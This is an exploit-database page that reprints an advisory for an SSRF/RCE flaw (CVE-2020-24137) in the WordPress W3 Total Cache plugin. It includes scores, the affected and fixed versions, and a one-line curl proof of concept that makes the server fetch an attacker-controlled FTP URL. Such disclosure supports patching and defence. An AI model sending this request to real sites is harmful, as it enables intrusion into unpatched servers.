Advertisement






Wordpress - W3 Total Cache - SSRF / RCE

CVE Category Price Severity
CVE-2020-24137 CWE-918 Price not specified High
Author Risk Exploitation Type Date
Luka Sikic Critical Remote 2019-05-08
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H 0.893 0.9829

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050090

Below is a copy:

Wordpress - W3 Total Cache - SSRF / RCE
|================================================================================|
[+] Title : Wordpress - W3 Total Cache - SSRF / RCE
[+] Version : W3 Total Cache <= 0.9.7.3
[+] Download link : https://fr.wordpress.org/plugins/w3-total-cache/
[+] Date : 2019-05-06
[+] Description:

The implementation of `opcache_flush_file` calls `file_exists` with a parameter fully controlled by the user.

[+] Proof of Concept:

curl 'http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php' --data 'nonce=974ca6ad15021a6668e7ae02e1be551c&command=flush_file&file=ftp://y.y.y.y:zzzz/'

[+] FIXED in : version 0.9.7.4

|================================================================================|

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.